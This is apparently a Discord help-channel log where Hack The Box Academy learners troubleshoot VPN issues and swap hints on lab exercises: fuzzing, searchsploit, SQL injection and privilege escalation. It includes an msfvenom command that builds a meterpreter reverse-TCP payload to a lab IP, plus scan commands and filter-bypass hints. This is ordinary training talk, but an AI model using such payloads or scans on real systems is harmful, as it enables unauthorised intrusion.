pull-filter ignore "route-ipv6"
pull-filter ignore "ifconfig-ipv6"

rich mulch
#

ah ok

#

still the same errors

copper sparrow
#

wait

#

i'll post my conf

rich mulch
#

ah I got it, because I choose file ovpn protocol tcp (443)

#

but in the config file use proto udp

#

that why I failed LUL

rich mulch
copper sparrow
#

you're welcome

pallid breach
#

getting started

#

Web Enumeration section

#

idk what to do

#

nothing works

#

and anything I try to do is full of errors

#

I cannot acces the target http://x.x.x.x/

young sleet
#

dm me the ss of the question @pallid breach

pallid breach
#

ok

copper sparrow
#

somene could help me?

#

First, try to update any city's name to be 'flag'. Then, delete any city. Once done, search for a city named 'flag' to get the flag.

#

i've done all requirement but when i've ask search flag city empty array

#

and no flag

fair cove
#

Hey all

#

So on the Password Attacks Password Reuse / Default Passwords
It asks me to find some credentials for mysql
I cant find it. Any hints?

rustic sage
#

Anyone able to give a nudge on Command injections skill assment? got the request for the payload but keep getting malicious request denied {nvm, found it}

vast geyser
vast geyser
quaint marsh
#

PASSWORD ATTACKS

#

what lists to use to guess the name and password at the beginning of the module? i am using top-usernames-shortlist.txt and rockyou-20.txt but something is taking too long! usually the rules say that the bust during training should not be longer than 30 minutes.

timber tide
#

Anyone else doing AD Enumeration & Attacks Skills Assessment 2 and having an issue connecting to the attack host? I was connected, then lost connection, wouldn't let me connect back to that host so reset the target (a couple times) and reset pwnbox as well, it won't ping or connect to the generated target IP?

spare condor
#

Anyone else connectivity issues with the Password Attacks module? (ps. I'm using the pwnbox as attacking machine)

iron plaza
polar widget
#

My dear moderators, and staff of HTB academy

#

For how long can we expect the maintenance work to go

#

So we take round off break and do other stuffs

fathom bay
#

anyone avaible to help me with the file upload > type filters?

lethal atlas
#

@fathom bay your looking for the magic byte for a jpeg. begins with ÿ and ends with Û

raven cairn
#

Can we be notified when the VPN is working?

lethal atlas
quiet prism
#

quick fuzzing question. i need to use this string from academy it says to remove some stuff from the list, but it doesn't seem to be doing that. i've compared file paths etc and it works so i'm not sure what i'm missing
sudo sed -i 's/^#.*$//g' /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt && sudo sed -i '/^$/d' /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt

lethal atlas
#

that should remove any commented lines from the start of the text file.

#

providing that is where your actual Seclist folder resides. On my VM I do not have /opt/useful. My seclists is in /usr/share/wordlists/

quiet prism
#

yeah just double checked it. that filepath is fine and the document is definitely there

#

but i'm getting 87k checks which doesn't take forever but no results

west canopy
onyx dust
#

does anybody else have this problem?

#

i've respawned it so many times already

#

always dont connect or ping

iron plaza
polar widget
silver laurel
#

Hey everyone, I haven't been paying attention when I complete modules, is there a way to see what, if any, boxes are recommended to hack after each module is completed?

quaint marsh
west canopy
#

Check the Resources at the top, they give you a zip file with wordlists to use

acoustic owl
quiet prism
#

@polar widget yeah like i dunno what i'm doing wrong. probably a random typo but i'm copy/pasting strings and double checking they're in the directories the lesson says they are

quiet prism
#

if anyone can help me troubleshoot i'd appreciate it

quaint marsh
west canopy
#

np!

quiet prism
#

fun with ffuf

young sleet
#

Anyone who could guide me a little bit

pliant summit
#

hey guys im in last section of the attacking web apps with ffuf module

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://FUZZ.academy.htb:30556/

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.4.1-dev
________________________________________________

 :: Method           : GET
 :: URL              : https://FUZZ.academy.htb/
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

:: Progress: [4989/4989] :: Job [1/1] :: 956 req/sec :: Duration: [0:00:06] :: Errors: 4989 ::

for some reason, i get all errors when i simply try to find subdomains, what am i doign wrong?

quiet prism
pliant summit
#

i didnt spoil anything

quiet prism
#

i just finished the section i'm on . turns out ffuf really wants a full window otherwise it FREAKS out. did the exact same command i've been using but tried with a full window and it finally worked

quiet prism
pliant summit
#

ok

acoustic owl
young sleet
#

could you explain a bit more in dm @acoustic owl

rich mulch
#

====
Hello guys, I am stuck at this.

Any hints?

west canopy
#

@rich mulch check what group the secaudit user is part of, then run a find command to find files part of that group

#

The flag is hidden in a log file 🙂

spare condor
#

@unique valve Hey! I have the same problem. Can I DM you about Dynamic Port Forwarding with SSH and SOCKS Tunneling?

rich mulch
west canopy
#

its in an ||apache log||

timber tide
#

Hey All, AD Enumeration and Attacks Skills Assessment 2 - I'm stuck on the "Locate a config file contaiing a MSSQL connection string" task. Any help or push in the right direction on where to locate that config file?

rich mulch
west canopy
#

@timber tide Try using ||snaffler.exe|| 🙂

timber tide
#

Thanks, will give it a try

tiny ledge
#

Any help with: Web Attacks -- Bypassing Security Filters -- Second Question | Am I supposed to use the reset.php for this? It just keeps deleting everything and giving me the same flag I got from first part

west canopy
#

@tiny ledge try making a POST to index.php

tiny ledge
#

EDIT: Tried again and it worked, thanks! Got the flag

sweet heron
#

Module pivoting, tunneling and port forwarding: section meterpreter tunneling and port forwarding: I can't execute any meterpreter payload on the ubuntu target. I've tried x64, x86, meterpreter_reverse_tcp, meterpreter/reverse_tcp, etc, but all I get when executing it is Segmentation fault (Core dumped) The msf handler catch the session, but it instantly closes.

upper vault
#

@sweet heron if you're getting a seg fault, on the machine catching the shell, it's buggy, its overwriting the wrong memory space. Is Msf up to date?

sweet heron
#

I'll try updating, but should be. It segment fault on the target, not my host.

slow ruin
#

Did anyone find the MySQL credentials for the Password Attacks - Password Reuse / Default Passwords? I found the answer but it was not on the target. Used a resource listed in the sections reading and was wondering if that was intended or not.

west canopy
#

I believe that's intended

fallow cypress
#

Hola

#

hi how are you

sweet heron
#

OK, I'm having issues. My VPN connection doesn't work after an update of my kali VM. It connects ok, I've got the same usual IP, but can't ssh any target. Also, usually I'm able to go on the internet with the VPN on, but not anymore (i know about default route). I've tried fresh VPN file, same problem. Any server down ?

west canopy
#

Have you tried alternating between US and EU vpn keys?

lethal latch
sweet heron
#

Main platform VPNs time out too. Did the update broke openvpn (reinstall doesn't help) or broke some config (but which?)? I'm on kali 5.18.5-1 in a VM.

upper vault
#

whats your openvpn version?

sweet heron
#

2.6.0

upper vault
#

try rolling back to 2.5.5

#

just tested mine, 2.5.5 works fine

sweet heron
#

It's actually 2.6_git for some reason.

upper vault
#

? did you clone and make from github?

sweet heron
#

not at all.

upper vault
#

ya try rolling it back, or a different repo

stiff moon
#

yo
need help on the Active Directory Enumeration & Attacks
with this question... the other questions was kinda easy but this makes no sense

"What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word)"

upper vault
#

@sweet heron well looks like mine is broken now too, I just updated my ubuntu, now im getting openvpn errors

iron plaza
upper vault
#

@iron plaza that's likely. Anyone else having vpn issues?

iron plaza
upper vault
#

ahaa

sweet heron
iron plaza
#

well looks like another day of break I guess

upper vault
#

ya definitely is a problem on HTB side, it's showing incorrect vpn status

iron plaza
#

heck even the pwnboxes in the academy modules are not working ... mine is still saying "instance is starting..." for the past 5 min

upper vault
#

ya, the instances aren't working either, so looks like all of it is having networking issues

iron plaza
#

is there a mod or HTB staff that can notify us when the VPN issue is resolved?

upper vault
#

Dunno, I don't see any update on twitter, and I don't see one on the regular page or academy page

iron plaza
#

seems vpn is working guys

upper vault
#

they did something different, but it's still not establishing a connection for me

iron plaza
#

i connected to the EU server

upper vault
#

maybe the us servers are down

#

or the vips

iron plaza
#

probably

upper vault
#

vip eu is still down for me

iron plaza
#

most likely they are making the rounds for all levels of vpn

upper vault
#

think this has anything to do with the ubuntu 22 dist upgrade today?

#

if their openvpn servers run ubuntu that might be why

iron plaza
#

i am running kali and did an upgrade yesterday and faced the same issue so it is mostly an openvpn config on HTB's side

upper vault
#

if it takes longer than tonight i hope they shoot us an update

iron plaza
#

i started to think some giga chad hacked the entire platform as oppose to the pwn boxes

upper vault
#

I mean it's probably possible, and I'm sure they'd love someone to test it to point out possible bugs or security issues

coral heath
#

Can someone please help me with the flag5 SQLMAP Essential modules?

upper vault
#

@iron plaza is your eu connection really working?

iron plaza
#

mind you i am using the 2.6_git version of openvpn

upper vault
#

so maybe their openvpn server updates are kicking back 2.5.5 client connections

#

someone else earlier was using 2.6git and had similar connection issues

iron plaza
upper vault
#

did you install through apt?

iron plaza
#

yes

#

I removed and reinstalled and with apt-get and got that aforementioned version

upper vault
#

hm, i did a reinstall a couple hours ago and it gave me 2.5.5 again

#

do apt and apt-get have seperate repos?

#

@coral heath sry mate not ignoring you, having connection issues

iron plaza
upper vault
#

@iron plaza thought it did. just did apt-get, still got 2.5.5

iron plaza
#

Repositories are defined in /etc/apt/sources.list so perhaps ubuntu didnt roll it out?

upper vault
#

im so confused, openvpn's latest build is 2.5.7

#

I have a bad feeling that this is going to be an issue for just me

iron plaza
upper vault
#

maybe they rolled it out on apt before they updated their page, but weirdly their github doesn't seem like it updated to 2.6 either

coral heath
#

not sure why sqlmap essential modules I found flag5 tables but it keeps saying unable to retrieve the number of columns

upper vault
#

2.6 is referenced on their community page as "next up"

#

oh, weird so looks like it's dying after trying to add IPv6 to tun0, 'permission denied', did my ipv6 permissions reset with the dist?

upper vault
#

@iron plaza Hallelujah!

#

it was my upgrade, I guess it disables the /proc/ settings to =1 by standard

iron plaza
upper vault
#

@iron plaza Yup that was it. A similar issue in 2020 in the HTB forums showed the correct enable method

iron plaza
#

why do i feel like this was a needle in the haystack moment

upper vault
#

lol right? @iron plaza I appreciate the help, I would've just sat and waited like a chump without your help

iron plaza
upper vault
#

lol, helped enough. We narrowed it down to an issue on my end

iron plaza
#

that solution though was something so difficult to come up with considering the problem was not usual

upper vault
#

yup, lots of changes today. If someone comes around later, they can "cat /proc/sys/net/ipv6/conf/all/disable_ipv6 ", and if it shows "1", they just need to "$ sudo sysctl net.ipv6.conf.all.disable_ipv6=0" to fix it

#

i'm sure I'm not the only one using ubuntu

pliant summit
#

hey guys im in last section of the attacking web apps with ffuf module

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://FUZZ.academy.htb:30556/

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.4.1-dev
________________________________________________

 :: Method           : GET
 :: URL              : https://FUZZ.academy.htb/
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

:: Progress: [4989/4989] :: Job [1/1] :: 956 req/sec :: Duration: [0:00:06] :: Errors: 4989 ::

for some reason, i get all errors when i simply try to find subdomains, what am i doign wrong?

upper vault
#

@pliant summit I'm trying it now, getting errors too

pliant summit
#

oh , is there something wrong with the module?

upper vault
#

dunno, i'm gonna pop into the mod real quick and check

#

oh wait did you add the machine to your /etc/hosts?

#

it won't scan ".academy.htb" correctly if it doesn't route properly

pliant summit
upper vault
#

@pliant summit dunno, getting the same issues here

#

the machine is up

pliant summit
#

Yea, idk maybe we can ping the creator of the module?

rustic sage
#

hey can anyone help with the Skills Assessment - Using Web Proxies

#

cant seem to enable the button.

#

ive tried intercepting the response and altering the post form data but i cant seem to get the button to work.

upper vault
#

@pliant summit I gotchu bud

#

for a vhost enumeration you need to set the -H to alter the headers sent

#

you'll get a whole bunch, so you'll have to filter by size or words or lines to find the right subs

#

@rustic sage I'll see if i can help

rustic sage
rustic sage
upper vault
#

@rustic sage good deal, lol I wasn't fast enough

rustic sage
#

no worries i feel kinda dumb for asking lol

upper vault
#

@rustic sage lol np

visual snow
#

Can anyone assist with broken Authentication : Predictable Reset Token? I have created the script and using it but it doesn't seem to be working correctly..I am unsure

pliant summit
visual snow
#

@lethal atlas I think I might have gotten it but ty! Sorry!

lethal atlas
#

np

iron plaza
#

is there an issue with vpn again?

mossy solstice
#

lemme check

iron plaza
#

i connected to the box but when i ping the ip it shows 100% packet loss

iron plaza
mossy solstice
#

yeah i get dummy packet loss too

iron plaza
#

i restarted the vpn session and machine ... still the same thing, I connect to the vpn but the target machine ip when pinged gives me 100% packet loss

iron plaza
mossy solstice
#

idk lmao

tepid jolt
#

Hi, I am working on FILE UPLOAD ATTACKS- Limited File Uploads. And I really need help in that. I have no idea where to start. I have done all the previous ones and knows them well. Thanks for any help.

white mulch
#

Can anyone nudge me on Cross-Site Scripting skills assessment?

pliant summit
#

how long does it usually take for someone to finish the junior pentester path from start to finish?

acoustic owl
pliant summit
acoustic owl
acoustic owl
pallid breach
#

module 77 section 843 (Getting Started, Public Exploits)

#

Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file.

#
searchsploit http://x.x.x.x:y/
[*] exec: searchsploit http://x.x.x.x:y/

Exploits: No Results
Shellcodes: No Results
#

in msfconsole^^^

primal sundial
#

searchsploit searches exploitdb

#

So you'd do

#

searchsploit wordpress

#

Not the IP

#

Search the names of services running on the server

pallid breach
#

it shows a ton of names and other things

#

and when I accessed the ip+port in the browser

#

I didn't get a domain

#

simply the ip and the port

high zinc
polar widget
#

We gotta ||remove|| something

pallid breach
#

using search exploit wordpress

high zinc
#

You need to Try to identify the services running on the server

#

which WP modules can you find? anything else of interest?

pallid breach
#

...

#

I don't understand

#

how am I supposed to identify the services

#

nmap scan?

polar widget
#

Yes

high zinc
#

Wordpress is like Windows; it's a system where you can run many plugins and other code inside it

#

some of those plugins might be old

#

also that

pallid breach
#

the nmap takes a while

#

nmap -Pn -sC -sV 206.189.25.173

#

idk what to do

charred depot
#

hello

pallid breach
#

hello

charred depot
#

im a begginner

pallid breach
#

good

#

and use ++verify

charred depot
#

can u tell were to start

pallid breach
charred depot
#

ok

#

thanks

pallid breach
pallid breach
high zinc
#

it's an addition to the website, created by potentially somebody else

pallid breach
#

ctrl+u?

high zinc
#

e.g. a webshop or a feedback button

pallid breach
#

like hyperlinks?

high zinc
#

no

pallid breach
#

i fucking hate exploits

#

2hrs now

high zinc
#

wordpress is a Content Management System, i.e. a system that translates your input content in to a website - like a blog, where you don't need to upload HTML to add a new page, but just click "create new blog post" and WordPress does the rest

pallid breach
#

okay

high zinc
#

WP also allows you to install modules or plugins. These are components made by WP or by other people

pallid breach
#

wp is an acronym for wordpress

high zinc
#

So where WordPress might help you build a blog out of the box without anything else installed, it won't help you build a webshop

#

yes

pallid breach
#

right?

#

good

#

now how do I identify the wp modules

high zinc
#

There's a few ways, but I don't know if they are the intended ways for you right here and now

charred depot
#

@high zinc pls tell me how to start

pallid breach
#

then how am I supposed to pass the test

high zinc
#

There's a whole Academy Module (course) about hacking wordpress, so I'm thinking what you're looking for is much less complicated

charred depot
#

ok thanks

pallid breach
#

I am simply stuck here and afterall I need to get the content of the /flag.txt

#

if I would've known the website domain so I can use searchsploit

high zinc
#

searchsploit doesn't search websites, it searches for product names like "Microsoft Word" or "Discord"

#

ok for this particular test @pallid breach what you gotta do is open the website and read

#

A large part of hacking is not to run tools and push buttons, it's reading and analysing what you are presented with

copper sparrow
#

just a small issue i've on first Privilege Escalation

#

question number2 said when you gain access to user2 try to escalete root privileges

#

i've found the id_rsa and id_rsa with wrong permission so i've copied both files, i've tried to ssh to local 80 port where ssh daemon is running but when i'm trying to connect to this service

#

Load key "/home/user2/id_rsa.pub": invalid format

#

md5sum is the same 😦

pallid breach
#

but i don't know how the product name

high zinc
#

Try to figure out what searchsploit does first

copper sparrow
#

i've tried to generate new pubkey with ssh-keygen -f id_rsa -y >id_rsa.pub

#

binvalid format 😦

#

someone could dm me for help 😦

pallid breach
high zinc
#

OK, so you're looking for the name of an application

rustic sage
#

hi there fellas

#

i am having trouble with an exercise from the hashcat module

#

the exercise on page 'hybrid mode'

#

ive been using the given mask as a suffix and a prefix and trying each hash type that comes up in hashid

#

but it doesn't find anything

#

i let it go for about 2 minutes, the hint says it should take 90 seconds

#

i feel like i am doing something wrong

pallid breach
#

and still doesn't work

#

I am sick of this

polar widget
radiant dagger
#

I stuck on it as well. The webserver is too slow and unstable. Restart so many times and still cant get a stable shell. no matter reverse or other pivots

neon granite
#

Hey 🙂
anyone know what is looking for with that the only one I'm missing. From the module Intro to analyze network traffic.

What addressing mechanism is used at the link layer of the TCP/IP model?

quaint marsh
#

SMB 10.129.202.136 445 WINSRV CASSIE READ,WRITE

#

empty file Flag.txt?

#

password attacks

copper sparrow
#

where is the mistake 😦 Load key "id_rsa": error in libcrypto

#

i'm stucked :(((((((((

copper sparrow
#

ok done sry 🙂

quaint marsh
#

anybody know?

#

flag.txt 0 Kb

copper sparrow
#

in smb flag.txt is 16kb

#

should be not transfert good

quaint marsh
#

if prit flag.txt - Error opening local file flag.txt

#

if get flag.txt - 0 Kb

sly zealot
#

i tried md5,md4,NTLM

broken warren
#

Can someone explain how Tornado payloads work for server side injection module? I cant get tplmap to compile correctly using HTB's steps and. When I curl using the example payload it doesn't get an error but it doesn't work either (same as what's shown in the payload)

reef rampart
#

Need some help with Command Injection - Skills assessment. Just can't get that thing to work. Found the injection point but i can't really seem to successfully inject anything really even though i belive i am bypassing the filters correctly. Would be grateful for some helps 😩

lethal atlas
lethal atlas
broken warren
stiff moon
#

yo
need help on the Active Directory Enumeration & Attacks
with this question... the other questions was kinda easy but this makes no sense

"What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word)"

rustic sage
#

curl

#

ops sorry wrong search :))

turbid hull
drifting glacier
#

Currently working the "initial enumeration of the domain" section of the active directory enumeration & attacks module, but when attempting to run wireshark like the lesson documents, I get this:

#

Unable to run wireshark as sudo as well. This is while connected to the student mention via xfreerdp as the lessons mentions

quiet prism
#

anyone available to help me with the ffuf skills assessment?

upper vault
#

@quiet prism what's the problem?

quiet prism
#

i've got the sub-domains and extensions

#

they're in my /etc/hosts file

#

am i just running a recursive scan and filtering out 403 errors?

upper vault
#

it says pages, have you tried visiting in a browser?

#

oh wait i see, ya so after doing the extension identification, do a normal recursive, ya

#

ya you got it

#

if you saw the hint don't get confused, the "use :PORT" is just for your answer, as the port per instance always changes

quiet prism
#

yeah the hint threw me ok. so i've got 3 sub-domains, so 3 recursive scans yeah?

upper vault
#

yup

quiet prism
#

by adding the sub-domains to etc/hosts doesn't it automatically scan them?

upper vault
#

no, if i remember right you can specify an option to scan multiple subs

#

it will go through one sub, then the other, etc. It'll take a while too

quiet prism
#

eugh 😢 i flew through this not sure why the skills assesment is suddenly giving me problems. doesn't help pwnbox keeps dropping connection so i have to go and update /etc/hosts xD

upper vault
#

ya apparently since update theres been connection issues. It might be worth spooling up parrot or kali on a vm just to do this challenge, so you won't drop connection

#

Btw, anyone know where I'm supposed to put questions related to regular boxes or challenges? the #welcome says ask in HTB:Platform but I don't see it in the channel list

drifting glacier
#

So HTB:Platform is a category, which holds the different chatrooms for challenges, boxes, battlegrounds, etc

#

It should be right below HTB:Academy and above HTB:Multi-Machine Labs

upper vault
#

Huh, ya not here

#

neither is HTB:Multi-Machine Labs

#

HTB: community help

#

academy

#

business ctf 2022

#

offtopic / serious discussion

drifting glacier
#

hmm, only other thing i can think of, did you verify your htb account?

upper vault
#

I think so, pretty sure I did, thought I had to to chat

drifting glacier
#

Hmm, might need to enlist a mod for that one

upper vault
#

Do i just dm one? I've not bothered em before

quiet prism
#

forgot to remove commented text from file zzz

upper vault
#

@quiet prism aha, good deal. Ya pwnbox is nice

quiet prism
#

how is this NOT the right url

upper vault
#

@quiet prism how far did you recurse?

quiet prism
#

think i need to go to 2

rustic sage
#

hey can anyone give me some help with fuzzing a cookie? im having some issues determining where to place the payload.

upper vault
#

@rustic sage Which module are you on, and which section?

rustic sage
high zinc
#

OK

upper vault
#

@quiet prism you're on the right track

#

@high zinc lol, what was that about?

high zinc
#

dunno

high zinc
#

spammed asking to get banned so I granted their wish 😄

upper vault
#

@high zinc😆

quiet prism
upper vault
#

@quiet prism you can set the -fc to ignore multiple status codes

quiet prism
upper vault
#

@rustic sage Oh I know where you're at. You need to tack on an alphanumeric at the end of this md5 hash, then decode, rinse and repeat

#

You can script something or just do it manually

#

@quiet prism nice 👍 Ya I really liked that mod, I learned a bunch about ffuf, and its good the tool is extremely intuitive and easy to use

quiet prism
upper vault
#

@rustic sage btw, I remember that specific challenge, but I don't remember what specific module or section that is, if you're having trouble remember to let people know where exactly you're at so they can look into it and help

#

@quiet prism good, stick with it, it only gets more rewarding and fun!

rustic sage
quiet prism
rustic sage
#

or am i going about this the wrong way ?

#

using web proxies : skills assessment

upper vault
#

@rustic sage The correct md5 cookie has 32 characters, it's missing the last character

#

its asking you to figure out what the last one is

rustic sage
upper vault
#

@rustic sage I'll jump back to it and look

rustic sage
#

thanks i appreciate it!!

drifting glacier
upper vault
#

@rustic sage Np. I'm going through it now

#

@drifting glacier Yup I figured it, turns out I'd never verified my account with discord

drifting glacier
#

Nice!

upper vault
#

well "I" meaning a moderate helped me ;p

drifting glacier
#

So hashcat is currently not cracking the hashes I've pulled in the same module im currently working on, attacking active directory. Running it on the machine the lesson says to ssh into, but it just shows an exhausted status and quits

#

While on kali, i get illegal hardware instruction, although i think that error is meaning i need to use a bash shell instead of zsh

#

Nope that's not it, still getting illegal instruction lol

quiet prism
#

@upper vault good god what a process this is xD

rustic sage
#

HI, I am currently on the XSS module section 'Phishing' for the question to get the cubes I am supposed to send a url that injects a login form to SERVER_IP/phishing/send.php , My problem is, I have a url that succesfully completes the assignment (I get the login credentials in the creds.txt file when I 'test' login through the url) but all the page tells me is 'Issue in sending URL!'. I have tried to URL decode the url and send that but then the url is invalid. What am I supposed to do here?

rustic sage
upper vault
#

@quiet prism Ya this one is kinda involved, I'm gonna have to do a refresher on this tonight

#

@rustic sage sry m8 I haven't done that mod yet

rustic sage
rustic sage
# rustic sage yea thats what ive been looking at the response length. i dont think i have the ...

I am not sure how specific I can be on answers as I don't want to break any 'spoiling' rules, but are you currently putting the payload in the cookie? and to create a complete cookie, you would have to add a prefix to the contents of the fuzzing list (add the 31 char string as prefix in the burp intruder) after which you have to encode the whole 32 char strings with the scheme you have deduced in the previous exercise.

#

yo

worthy zephyr
#

hey guys, can someone teach me how to install

#

kali linux

rustic sage
#

to teach me

#

linux

worthy zephyr
#

on my pc? my friend said to install to start learning pentesting

rustic sage
#

how to install packages and stuff

rustic sage
#

3

#

2

#

1

quiet prism
#

connection refused but it's DEFINITELY in my /etc/hosts

#

AHHHHH 😢

#

how is this not working. i had to have access to the sub-domains to scan. now when i send a curl request it's saying connection refused xD

quiet prism
#

sod it. watched a youtube video. did EXACTLY what they did but something is wrong with pwnbox or the vpn... not sure but it's done now xD and I know what i'm doing

coral heath
#

Can someone please help me with sqlmap essential the flag 7 ?

upper vault
#

@quiet prism lol, ya sometimes there's just connection issues, whenever i get burnt out I leave it alone, do something else, and come back to it in a day or two

sweet heron
#

Hi! Still stuck at pivoting module, meterpreter port forwarding section. I can't execute the payload on the ubuntu target. I get a Segmentation fault (core dumped). Any hint on how to diagnose the problem? I already tried different payloads and ports and my system is up to date.

#

My payload: msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.78 -f elf -o backup LPORT=9999

quiet prism
upper vault
#

@quiet prism 👍

#

@sweet heron sry m8 i haven't done that module, but seg faults can occur when you lack read or write permissions somewhere

sweet heron
upper vault
#

looks more like its hanging or bugged, if you had to kill your payload twice, then 3rd time just crashed on its own

#

@sweet heron ya, sry, sometimes it just takes playing with everything till something jenky works. Just spent 4 hours on a starting point box, found out my spacing between some commands was off, and that was enough to break the whole thing

sweet heron
#

Executing with sudo just outputs Segmentation fault (no core dumped anymore).

upper vault
#

seg fault / core dump same thing

#

well "same thing"

#

ya either it's lacking a permisson to read or write somewhere, or its overwriting/overflowing memory somewhere till it dies

#

could be worth looking for other payloads

#

@sweet heron I'm actually surprised you're using proxychains, i've never been able to get it to work for me

rustic sage
#

id recommend looking at the networkchuck vid on it

#

he explains it a bit more clearly

upper vault
#

@rustic sage well I will do just that, thanks!

sweet heron
limpid wharf
#

Im stuck at getting started

Once you gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt'.

im stuck at this part

Let us copy key.pub, then on the remote machine, we will add it into /root/.ssh/authorized_keys:

user@remotehost$ echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys

how do i use this command?

#

and then i dont get how to use the vim id_rsa and where to find it so i can chmod 600 it

so i copied the id_rsa with vim from the root system but how can i use it?

sweet heron
coral heath
#

I'm in the skill assessment part for sqlmap essentials... could anyone please hlep me with this?

sweet heron
#

sure, DM

past lantern
#

Hey there could I talk to somebody about a nudge on Trick?

sweet heron
past lantern
sweet heron
half gazelle
#

ok, Ima newbie, but I know for a fact some of these answers to the questions in the Linux Fundamentals are straight up wrong. I find the "correct answers" in a walkthrough, and that command isnt in a proper context or a switch doesnt really exist.... am I missing something? Did the Parrot tool modules update and the lab doesnt match the material anymore? I feel weird adding to erratum if its really me.

raven cairn
#

What specifically is wrong with it???

iron plaza
glass reef
#

hey

polar widget
# half gazelle ok, Ima newbie, but I know for a fact some of these answers to the questions in ...

There's a padding of vagueness in that module, its done in order for individual to explore the possibilities, experiment with those possibilities and arrive to the relevant answer.

This is very critical skill to be developed over time, you may ask why? That's because often times we'll have to troubleshoot our environment we're working with, whether its attacking box or inside the target host. Tools might not work, and you have to be careful with the choice of commands as well.

Generally, till that point I would run ABC command to directly get XYZ result, but I cared less about other information it yielded, like PQR which could be useful.
You know these encounters build our experiences. Embrace it. Have fun!

west canopy
#

Anyone able to give me a sanity check on Attacking Enterprise Networks - Post Exploitation? For the life of me I cannot get the double pivot to work.

stable sparrow
#

hey, can someone please assist me with the footprinting medium lab? ||I have mounted the NFS share, but when I'm try to get into the TechSupport directory, I get "permission denied". Not sure how to proceed.|| edit am dumb lol

distant stream
safe token
#

guys how do i verify on for the main chanel? the dm i get i empty. guess i should do something about it but idk what

glass reef
#

wheres the HTB beginner chat at

glass reef
polar widget
glass reef